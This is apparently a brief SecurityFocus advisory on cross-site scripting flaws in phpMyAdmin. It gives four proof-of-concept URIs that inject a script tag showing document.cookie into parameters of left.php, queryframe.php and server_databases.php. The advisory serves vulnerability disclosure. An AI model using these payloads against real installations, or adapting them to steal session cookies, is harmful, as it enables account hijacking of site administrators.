PHPMyAdmin Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example/com/left.php?lang=en-iso-8859-1&server=1&hash=/left.php?lang=en-iso-8859- &server=1&hash="><script>alert(document.cookie)</script>
http://www.example/com/queryframe.php?lang=en-iso-8859-1&server=1&hash="><script>alert(document.cookie)</script>
http://www.example/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by=db_name&sort_order="><script>alert(document.cookie)</script>
http://www.example/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by="><script>alert(document.cookie)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus